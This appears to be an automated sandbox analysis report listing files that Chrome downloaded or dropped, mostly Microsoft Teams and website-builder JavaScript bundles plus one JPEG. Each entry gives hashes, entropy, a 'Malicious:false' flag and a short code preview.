                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[273198],{273198:(e,C,t)=>{t.d(C,{C:()=>r});var a=t(513432),l=t(395225),n=t.n(l),c=t(485529),s=t(829289),r=(0,c.Ke)({svg:function(e){var C=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:C.svg},a.createElement("g",{className:n()(s.Q.outline,C.outlinePart)},a.createElement("path",{d:"M7 11C7.55228 11 8 10.5523 8 10C8 9.44771 7.55228 9 7 9C6.44772 9 6 9.44771 6 10C6 10.5523 6.44772 11 7 11Z"}),a.createElement("path",{d:"M8 13C8 13.5523 7.55228 14 7 14C6.44772 14 6 13.5523 6 13C6 12.4477 6.44772 12 7 12C7.55228 12 8 12.4477 8 13Z"}),a.createElement("path",{d:"M10 11C10.5523 11 11 10.5523 11 10C11 9.44771 10.5523 9 10 9C9.44771 9 9 9.44771 9 10C9 10.5523 9.44771 11 10 11Z"}),a.createElement("path",{d:"M11 13C11 13.5523 10.5523 14 10 14C9.44771 14 9 13.5523 9 13C9 12.4477 9.44771 12 10 12C10.5523 12 11 12.4477 11 13Z"}),a.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7979)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):8086
                                                                                                                                                                                                                          Entropy (8bit):4.542394330601067
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:kxpPTqixUsv1FEouEwUFNbgF3sTnF4m4/rbgI8DT1DdhWMJT:kvTL/7fbgxunF4m4Dbgn13JT
                                                                                                                                                                                                                          MD5:BCD0E506BC6CECA01C797848A1E18B4D
                                                                                                                                                                                                                          SHA1:83C4C588CC01313141E40BAB05D3D5053CA55DEA
                                                                                                                                                                                                                          SHA-256:0847EE837BA3D9F99BC54F557E11FC4A1BCDEB998F68AD2A5875BC25C567B45D
                                                                                                                                                                                                                          SHA-512:8BBB26B17FC40CA917EF87302C0F7B0E616A8BD67F5F49085CBA52E256335B2C29311432CF28F9BDF17D4741D729D0E10E45A12A46B7A3D7ED226A5D12E63E27
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/49749-fa07bf3bd120c3c7.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[49749],{49749:(a,l,c)=>{c.d(l,{va_:()=>Z,i00:()=>e,aYy:()=>v,S61:()=>m,yDM:()=>L,nU0:()=>M,iAS:()=>H,p4K:()=>t,LMj:()=>u,Jtj:()=>i,OEF:()=>V,csZ:()=>s,OL4:()=>D,I0J:()=>U,KDM:()=>r,K4O:()=>A,APn:()=>n,VyF:()=>g,x7t:()=>R,IuD:()=>o});var h=c(693935);const Z=(0,h.U)("Delete16Regular","16",["M7 3h2a1 1 0 0 0-2 0ZM6 3a2 2 0 1 1 4 0h4a.5.5 0 0 1 0 1h-.56l-1.2 8.84A2.5 2.5 0 0 1 9.74 15h-3.5a2.5 2.5 0 0 1-2.48-2.16L2.57 4H2a.5.5 0 0 1 0-1h4Zm1 3.5a.5.5 0 0 0-1 0v5a.5.5 0 0 0 1 0v-5ZM9.5 6c.28 0 .5.22.5.5v5a.5.5 0 0 1-1 0v-5c0-.28.22-.5.5-.5Zm-4.74 6.7c.1.75.74 1.3 1.49 1.3h3.5a1.5 1.5 0 0 0 1.5-1.3L12.42 4H3.57l1.19 8.7Z"]),e=(0,h.U)("Delete20Filled","20",["M8.5 4h3a1.5 1.5 0 0 0-3 0Zm-1 0a2.5 2.5 0 0 1 5 0h5a.5.5 0 0 1 0 1h-1.05l-1.2 10.34A3 3 0 0 1 12.27 18H7.73a3 3 0 0 1-2.98-2.66L3.55 5H2.5a.5.5 0 0 1 0-1h5ZM9 8a.5.5 0 0 0-1 0v6a.5.5 0 0 0 1 0V8Zm2.5-.5a.5.5 0 0 0-.5.5v6a.5.5 0
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (47805)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):47913
                                                                                                                                                                                                                          Entropy (8bit):5.382366921986537
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:SUpJLd/iN3A5JewIE2c4mF4CJKtD50g+SaranNE3DjeKH1b:ZLdmKpIEtr9gqranu3DqKH1b
                                                                                                                                                                                                                          MD5:334DDD74DD7F780C7829E4EAC83CDFF6
                                                                                                                                                                                                                          SHA1:0993A41A48093AFCB5F82C25F43AE6A7279EC815
                                                                                                                                                                                                                          SHA-256:7742AE0803C92EEEDCA7F31AE73A7CAF0D53AEE1A5553FCF633414B1D1AE22CE
                                                                                                                                                                                                                          SHA-512:8D863E8319BD9B583C767104A8DD88B846D0B8D01892C7D3DBC3CA7FBBB5BF026F17CBB83767FBD4B183AE555C74B3F141C86519AF9B2AAB3A9ED1FB45E6D0C1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/192699-192c894d6acbddef.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[192699],{504405:(e,t,n)=>{n.d(t,{P:()=>r,C:()=>o});var r="data-is-focusable",o="data-disable-click-on-enter"},888846:(e,t,n)=>{n.d(t,{l:()=>r,E:()=>o});var r=function(e){return e[e.none=0]="none",e[e.all=1]="all",e[e.inputOnly=2]="inputOnly",e}({}),o=function(e){return e[e.vertical=0]="vertical",e[e.horizontal=1]="horizontal",e[e.bidirectional=2]="bidirectional",e[e.bidirectionalDomOrder=3]="bidirectionalDomOrder",e}({})},953543:(e,t,n)=>{n.d(t,{kR:()=>f,ZG:()=>c,QC:()=>i,rC:()=>s});var r={3:"Cancel",6:"Help",8:"Backspace",9:"Tab",12:"Clear",13:"Enter",16:"Shift",17:"Control",18:"Alt",19:"Pause",20:"CapsLock",27:"Escape",28:"Convert",29:"NonConvert",30:"Accept",31:"ModeChange",32:" ",33:"PageUp",34:"PageDown",35:"End",36:"Home",37:"ArrowLeft",38:"ArrowUp",39:"ArrowRight",40:"ArrowDown",41:"Select",42:"Print",43:"Execute",44:"PrintScreen",45:"Insert",46:"Delete",48:["0",")"],4
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1352)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1400
                                                                                                                                                                                                                          Entropy (8bit):5.307032039583678
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:c6BLQZSwXZSUcUxQAQId+06QyyU+bHJRWIFSPhXCoiCUPGyTiKNPR138IHrIYf:j+SwJSxAQ0H0OpwUSPhXCoiCUeuiKNPd
                                                                                                                                                                                                                          MD5:5CC6B93D41889C0A55C6C4FCD2D89713
                                                                                                                                                                                                                          SHA1:51A59C1DAE337817C4EBAC39FBE61C232705A893
                                                                                                                                                                                                                          SHA-256:8671CFDFA128168DB2136D7C17F55BA98DDBA221CDD1ACBBE559D4969280FD51
                                                                                                                                                                                                                          SHA-512:8BCAAB1399B6D4D7475C4CF1DC45B0477A9D2AD37578DFCCF23C0C9303716DA1DECD5FBA858D5DD609CB89BCC784E04B72A0D7136BC6EE60DC3EF69CAB977C33
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-index2-87bd33e6.js",["exports"],(function(t){"use strict";t.a=function(){let t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:"medium";return{"> :nth-child(n)":{marginBottom:t}," > :last-child":{marginBottom:"0 !important"}}},t.b=function(){let t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:"medium";return{"> :nth-child(n)":{marginRight:t}," > :last-child":{marginRight:"0 !important"}}},t.c=function(t){const e=function(t){if("string"!=typeof t||"{"!==t[0])return null;try{return JSON.parse(t)}catch(t){return null}}(t)||{};let n=0;return e.blocks&&e.blocks.forEach((t=>{const e=t.text.length;n+=(global._||guac.lodash).clamp(e,25,Math.max(e,25))})),n},t.g=()=>{const t=document.getElementsByClassName("ux-scaled");let e=1;return t&&t.length>0&&(e=t[0].getAttribute("data-scale")),e},t.r=t=>{let{count:e=0,fontSizeMap:n={},defaultFontSize:r}=t;const i=(global._||guac.lodash).reduce(n,((t,e,n)=>{let[r,i=Number.MAX_VALUE]=e;return t.push({range:[r,i],
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 1256x835, components 3
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):93499
                                                                                                                                                                                                                          Entropy (8bit):7.976525545364295
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:Cyy2vd/HZBcDwvVRn6ppt7w5qgHDHpuYVV2PScWzCP80LyRGXybjR07vfyf6Ozfh:rDtHhtRnov7wqw4YL2PS9CBuRcyJkfy9
                                                                                                                                                                                                                          MD5:75E97AC3EE4D041D0C1698EE7B84DB93
                                                                                                                                                                                                                          SHA1:851BB3BB141A03907BAED4FEF857828CA79BCF5B
                                                                                                                                                                                                                          SHA-256:89BC6C519A8423FDC5DB42781A0A42FD0AA12348CF2E8BAE974541937A2209CA
                                                                                                                                                                                                                          SHA-512:06EED2D1FDB5828576CA008207AA1AE6B9B9B2D4995E595C5052C08C07E3E88A21D18683930EE88704EC9C2E73D18C0AA132348B65E5F38D1F7385ADDB940813
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......8c......8c................0210....................0100................................C..........C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......C...."........................................K.........................!1.AQ."2aq..#3...BR.br..C...$4DST...%s..c5...6E................................&......................1.!..AQ."2aB.#............?....k}..A.E....J,.hE.0]/}...)..$....d.;.....k".E...ZG....V@\4.P@..;9_.N6Z.;.=..X.....f#^...J..?...O.(e..Rl.I.W..'...;.Sa..^............x.cq..i.n.4.....`p....s{.l.vQ..h7ME.A.O .<_.O..0...-.U.=."N].1...w....v..p.*...J....wg...P\..N..:..VO..j.'..<rx...G.u....6co'..3..../..=MU...O...E..#...@*t^..{.....u..K......y...!XS.B.~.e....m..IYxx.....7.n.E.XT..So.i...,..F..b.2..S...)..s..,N.xSb..f. s.-m]..i1.?..?.a.....}...\..z.....7......G....V...
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32173)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):32281
                                                                                                                                                                                                                          Entropy (8bit):5.623211319817814
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:ky1r565y2Dg/3BsGZa+FOZSQ4dkSPNmsMqYy:kir56I2qZxOZ94dkSFYy
                                                                                                                                                                                                                          MD5:7DF8076203955E41A3A1DAAF66AF32F4
                                                                                                                                                                                                                          SHA1:DA4EE21BE5530F03B5ABAF6340D46306AD1D2D82
                                                                                                                                                                                                                          SHA-256:49F636559DA44780ABE2D07DF84DDB68B7A0D35228ABB6F01F8F6E4646C330CE
                                                                                                                                                                                                                          SHA-512:EC4165C1A1C0B99E2385401C4F8BF044F1AADFE6CD7F00C63C9FDB19DECCF22B9D7CB315DBB226E0D34C7AB03173380D454A310D106A8E14B020258D15E8C98F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[675783],{554404:(e,n,t)=>{var i,a,o,s,E,r,S,_,T,l,I,A,c,C,R,p,N,m,d,u,L;t.d(n,{qv:()=>i,SY:()=>a,Kt:()=>o,VA:()=>E,lM:()=>r,Pr:()=>S,Kv:()=>_,To:()=>T,PY:()=>l,bh:()=>I,D2:()=>A,np:()=>C,zD:()=>R,pU:()=>p,s4:()=>N,d8:()=>m,Cu:()=>d,wy:()=>u}),function(e){e.Work="",e[e.Freemium=2]="Freemium",e[e.Life=3]="Life"}(i||(i={})),function(e){e.Personal="personal",e.Channel="channel",e.Unknown="unknown"}(a||(a={})),function(e){e.GuardianChat="GuardianChat"}(o||(o={})),function(e){e[e.anonymous=0]="anonymous",e[e.default=1]="default",e[e.guest=2]="guest",e[e.msaGuest=3]="msaGuest",e[e.msaMember=4]="msaMember",e[e.otpGuest=5]="otpGuest",e[e.otpMember=6]="otpMember"}(s||(s={})),function(e){e[e.Admin=0]="Admin",e[e.Anonymous=1]="Anonymous",e[e.Guest=2]="Guest",e[e.Regular=3]="Regular"}(E||(E={})),function(e){e.x64="x64",e.ia32="ia32",e.x86="x86",e.unknown="unknown"}(r||(r={})),function(e){
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (16154)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):16297
                                                                                                                                                                                                                          Entropy (8bit):4.821418491177051
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:ys3Ja7t6zrFoOcsyB1w4saUut7gGQed7iLOy9XUWKVm/Zm2Z3Wy7TQDvi5hxXM/S:ySa7uKBpvcNAVMZ79ya
                                                                                                                                                                                                                          MD5:A9DD685A1BA04CBAAF4867C75277DD73
                                                                                                                                                                                                                          SHA1:8245BACA5CE8A257BE39458F62D2887ADA0D2189
                                                                                                                                                                                                                          SHA-256:2A717E15DDD479995D43BAAB1DBCE48FCAFCF3F66F0AC723CC7A9FB605A40958
                                                                                                                                                                                                                          SHA-512:B1686892FB4970EF78E41476FFB5A17B588804952E6AF5E5531BD127F6E65A40C4E4FB5C322B6455DEAC22C22A194643B22F713B5BF66245E1C46C0A4162C263
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[78047],{890679:(e,t,i)=>{i.r(t),i.d(t,{default:()=>a});const a={namespace:"premiumBenefits",locale:"en-us",translations:{current_plan_names:"{{planName1}} & {{planName2}}",current_plan_title:"Your free benefits",discover_try_buy_60_days_trial:"60-day trial, no card required",discover_try_buy_60_days_trial_exp:"Free 60-day trial, subject to eligibility",discover_try_buy_banner_count_down_mf:"{count, plural, =0 {You have # days left in your Teams Premium trial. Get the most out of premium features like AI-powered recaps, advanced meeting protection, and extra event engagement tools. <0>View all your benefits</0>} =1 {You have # day left in your Teams Premium trial. Get the most out of premium features like AI-powered recaps, advanced meeting protection, and extra event engagement tools. <0>View all your benefits</0>} other {You have # days left in your Teams Premium trial. Get
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3043)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):3092
                                                                                                                                                                                                                          Entropy (8bit):5.221416224205306
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:/NSXU/vuELNSXtiF7ANSXTJrrBNSXt7X5wqh:VcKncc7ycd3cd5w8
                                                                                                                                                                                                                          MD5:852CBC5322260E00B44F2C682F88B2C7
                                                                                                                                                                                                                          SHA1:BCAF229E6134F43EB5F974C9891E4D16FAF1D344
                                                                                                                                                                                                                          SHA-256:BAE437DBEFE58377D88C9D579DB7C59F4202F3FBF88866D0005FB375BE6B2CD7
                                                                                                                                                                                                                          SHA-512:F031B43F7FA0DA001F71DDCFFE5E322A94C5F1F52F7C4D67D34880243D9D361AC55C0E5001DD004390867CB31E5DEF5D4D9282E6E2ECB9AEC0E880AA5B786BA3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-loaders-fffeeba5.js
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-loaders-fffeeba5.js",["exports","~/c/bs-index3"],(function(e,a){"use strict";e.B=function(e){const{SVG:c}=(global.Core||guac["@wsb/guac-widget-core"]).UX2.Element;return this.merge({tag:"div",children:(global.React||guac.react).createElement((global.React||guac.react).Fragment,null,(global.React||guac.react).createElement(c,{viewBox:"0 0 44 44",width:"3em",height:"3em",fill:"currentColor"},(global.React||guac.react).createElement("path",{fillRule:"evenodd",d:"M31.968 23H12.032c-.57 0-1.032-.448-1.032-1 0-.553.462-1 1.032-1h19.936c.57 0 1.032.447 1.032 1 0 .552-.462 1-1.032 1"})),(global.React||guac.react).createElement((global.Core||guac["@wsb/guac-widget-core"]).UX.Style,null,a.k.loaderBalance)),style:{"> svg":{animation:"balance 1s infinite cubic-bezier(.62,.06,.33,.79);",transformOrigin:"center"}}},e)},e.C=function(e){const{SVG:c}=(global.Core||guac["@wsb/guac-widget-core"]).UX2.Element;return this.merge({tag:"div",children:(global.React||guac.react).crea
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (41773)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):41881
                                                                                                                                                                                                                          Entropy (8bit):5.370482617886562
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:5ZNH3StVknxinkQQ62Eqrr+rAxvapmEKr0f/rt4g40KH:5ZACUnk/rr+rAxipmLr0f/rj4F
                                                                                                                                                                                                                          MD5:22A4CD1FB7CB4D2F60EE393390C9A796
                                                                                                                                                                                                                          SHA1:3D48FD9A67F1BD5D3E4B5909A4254F5D48469987
                                                                                                                                                                                                                          SHA-256:EADFE9A27CDED1FB816A38BC313A0EA56D7C6633A33B3E2621CF9342FBF8BFAA
                                                                                                                                                                                                                          SHA-512:FF5A1AB495EB01AD640E34A1FE6FA2311781017CB111785D0785EF531AF034E3D172871837EC28F78896D21CC4CB6A9AC0356FFDA6661E7D472BEF8C0A3B04EA
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[674958],{428561:function(e,t,n){var o,i;void 0===(i="function"==typeof(o=function(){"use strict";return function(e,t){var n,o,i,a,r,l,s,u,c,d,p,m,f,h,v,g,x,y,b=e.options.window||b,w=b.document,C=this,I=!1,T=!0,E=!0,_={barsSize:{top:44,bottom:"auto"},closeElClasses:["item","caption","zoom-wrap","ui","top-bar"],timeToIdle:4e3,timeToIdleOutside:1e3,loadingIndicatorDelay:1e3,addCaptionHTMLFn:function(e,t){if(!e.title){for(;t.children[0].firstChild;)t.children[0].removeChild(t.children[0].firstChild);return!1}return t.children[0].innerText=e.title,!0},closeEl:!0,captionEl:!0,fullscreenEl:!0,zoomEl:!0,shareEl:!0,counterEl:!0,arrowEl:!0,preloaderEl:!0,tapToClose:!1,tapToToggleControls:!0,clickToCloseNonZoomable:!0,shareButtons:[{id:"facebook",label:"Share on Facebook",url:"https://www.facebook.com/sharer/sharer.php?u={{url}}"},{id:"twitter",label:"Tweet",url:"https://twitter.com/intent/tweet?tex
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (22831)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):22939
                                                                                                                                                                                                                          Entropy (8bit):5.352894727770317
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:YTxPvTzTOTsTcvJKWTRvxbiTPB2mcnQAi4XX0Q5km3cGfEVc53+qg4zfLBJwzVoR:mVHoS+Qrm3cGIc53K8tJwxoNnuIa53Vi
                                                                                                                                                                                                                          MD5:F70ED4AA684362939A4094E73EE14654
                                                                                                                                                                                                                          SHA1:41C54AD9CF605653A08C49BB3255CB84EFC7AC17
                                                                                                                                                                                                                          SHA-256:3F657976EC0B0E25DF25837FF6F97BF1EEED866950779CF0BF1B672C9154EAE4
                                                                                                                                                                                                                          SHA-512:106F239C6BA71AEE702DE05A95621AD0858AC65658A3C2462B2E3FD2AC8A9C862578D94AB64CF8EFB7714CB0CE259601147DE180FF97A5E1533BD62BCD6DF8F7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[459872],{150321:(e,t,n)=>{"use strict";function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},r.apply(this,arguments)}n.d(t,{A:()=>r})},90278:(e,t,n)=>{"use strict";n.d(t,{A:()=>o});var r=n(876653);function o(e,t){e.prototype=Object.create(t.prototype),e.prototype.constructor=e,(0,r.A)(e,t)}},89968:(e,t,n)=>{"use strict";function r(e,t){if(null==e)return{};var n,r,o={},i=Object.keys(e);for(r=0;r<i.length;r++)n=i[r],t.indexOf(n)>=0||(o[n]=e[n]);return o}n.d(t,{A:()=>r})},876653:(e,t,n)=>{"use strict";function r(e,t){return r=Object.setPrototypeOf?Object.setPrototypeOf.bind():function(e,t){return e.__proto__=t,e},r(e,t)}n.d(t,{A:()=>r})},353410:(e,t,n)=>{"use strict";function r(e,t){var n=Boolean(t.getRootNode&&t.getRootNode().host);if(e.contai
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7947)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):8055
                                                                                                                                                                                                                          Entropy (8bit):5.29510191086443
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:QxM0ytizz70XhjrgRn7Ekl12Tuyd6yxfoxG3wjs:uM0WUwXhf+IklI6yAydoxG3wA
                                                                                                                                                                                                                          MD5:D35255ECAC13D3B01B9EC8529DB26D0D
                                                                                                                                                                                                                          SHA1:ADB216D48717FC781924DEAD0349C7F349F71E7B
                                                                                                                                                                                                                          SHA-256:B246BC7FDE6806B27422C4979EA2C0692752402830BD2B1DAD1744896D5698D4
                                                                                                                                                                                                                          SHA-512:472ABAC0B5FD797A352473ABCCF561EF2DAC714EF2FF90CFC11224EB187E389E9FDBA478566608B13EA6EA912680AB007FA9F6885D06D80AEBA37C640537A0E7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/981462-f51da5697f0fb680.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[981462],{981462:(e,t,i)=>{i.d(t,{v:()=>R});var n=i(203557),r=i(407845),o=i(405501),a=i(953760);const s={...i(965991).MX,PairwiseBrokerApplicationInitializeBrokering:"pairwiseBrokerApplicationInitializeBrokering",BrokerClientApplicationHandleBrokerHandshake:"brokerClientApplicationHandleBrokerHandshake",BrokerClientApplicationBrokeredSSOSilentRequest:"brokerClientApplicationBrokeredSSOSilentRequest",BrokerClientApplicationBrokeredSilentRequest:"brokerClientApplicationBrokeredSilentRequest",EmbeddedClientApplicationSendSSOSilentRequest:"embeddedSSOSilent",EmbeddedClientApplicationSendPopupRequest:"embeddedPopup",EmbeddedClientApplicationSendRedirectRequest:"embeddedRedirect",EmbeddedClientApplicationHandleRedirectRequest:"embeddedHandleRedirect",EmbeddedClientApplicationSendSilentRefreshRequest:"embeddedSilentRefresh"},l=new Map([[s.PairwiseBrokerApplicationInitializeBrokering,
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4909)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):4979
                                                                                                                                                                                                                          Entropy (8bit):5.293405946326944
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:beukqzAqebwLvrm04HwiS1SoSuSwS0rtGiSfVSpSrtSG6mSiG5SmUS1CzHSTanSU:beuKwLaVq3BRZx+VA0h65ctHIanVvGbm
                                                                                                                                                                                                                          MD5:D657486D87334CB2FEFF7EA0BE814023
                                                                                                                                                                                                                          SHA1:CCCA2DB7A6D1B83764D75F4E660ECB23A0C3612F
                                                                                                                                                                                                                          SHA-256:0DECBDCF47E29C386E89A67226498BE4FB218C3749B1190FABB83D50590FCA59
                                                                                                                                                                                                                          SHA-512:F958ED459A315710B3C4EFFE1B0A11789B4B29B059EF793DF3F889EA2BB3F7AEAB868DC09B74F47E1B29A7A8B56ABB5B2BD2F3E0DE0FA17E3136D4AFD499ACCC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/bs-layout14-Theme-publish-Theme-0468020a.js",["exports","~/c/bs-_rollupPluginBabelHelpers","~/c/bs-index3","~/c/bs-themeOverrides","~/c/bs-index","~/c/bs-legacyOverrides","~/c/bs-modernThinRound","~/c/bs-defaultSocialIconPack","~/c/bs-loaders"],(function(e,t,r,o,a,n,i,s,l){"use strict";const{colorPackCategories:g,buttons:d}=(global.Core||guac["@wsb/guac-widget-core"]).constants,{LIGHT:u,LIGHT_ALT:c,LIGHT_COLORFUL:m,DARK:p,DARK_ALT:h,DARK_COLORFUL:y,COLORFUL:b,MVP:f}=(global.Core||guac["@wsb/guac-widget-core"]).constants.paintJobs,x=f;var I={id:"layout14",name:"craft",packs:{color:"#283878",font:"muli"},logo:{font:"primary"},packCategories:{color:g.NEUTRAL},headerProperties:{alignmentOption:"center"},paintJobs:[u,c,m,b,y,h,p],defaultPaintJob:x,buttons:{primary:{fill:d.fills.SOLID,shape:d.shapes.PILL,decoration:d.decorations.NONE,shadow:d.shadows.NONE,color:d.colors.PRIMARY},secondary:{fill:d.fills.SOLID,decoration:d.decorations.NONE,shadow:d.shadows.NONE,color:d.c
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):526300
                                                                                                                                                                                                                          Entropy (8bit):5.258891914056111
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:jCalLBeHIAVnh/Cst91N6FGGaUgsEheT4/BEKQo3gAlyRirdpzoyU:jhOBCstCTPyU
                                                                                                                                                                                                                          MD5:1F4ABBBDAD2B4C6EC49EE626C6F03453
                                                                                                                                                                                                                          SHA1:4566AA559176E9F485220533855045D29ED6DF3E
                                                                                                                                                                                                                          SHA-256:2B657AA41B1E9AC6BC291193C145B6D2045E6CD6AABE6A56F107B7983E32A432
                                                                                                                                                                                                                          SHA-512:44F0D68D086899E4C0B8B6C3BEBB7EBA69EB06FC3AECC81E664FA6F1A71FCC3B916DD73281A14C2A8AA0CF7A4412995D34698E4248A68FFDD20CAFBB9412F2FB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/365138-e937838d72d8903a.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[365138],{327005:(e,t,i)=>{"use strict";i.d(t,{c:()=>o});var n=i(362328);const a={kind:"Document",get definitions(){const e=(0,n.G)("query ServicesIoDataCallingServiceAdaptersActivitySettingsQuery($appId:String!,$subCategoryPageId:String) {activitySettings(appId:$appId,subCategoryPageId:$subCategoryPageId) {id,error,settingsList {key,value}}}");return delete this.definitions,this.definitions=e.definitions}};var r=i(354776);const o=async e=>{const{data:t}=await e.query({query:a,fetchPolicy:"no-cache",variables:{appId:r.n5.Meetings,subCategoryPageId:r.n5.Meetings}});return t?.activitySettings?.settingsList}},230749:(e,t,i)=>{"use strict";i.d(t,{R:()=>ee});var n=i(332752),a=i(805809),r=i(724801),o=i(424096),l=i(364819),s=i(554186),c=i(194649),d=i(46377),g=i(2596),p=i(926751);const u={403:"Forbidden",404:"NotFound",409:"Conflict",500:"InternalServerError",400:"BadRequest",503:"ServiceUnavailab
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (27440)
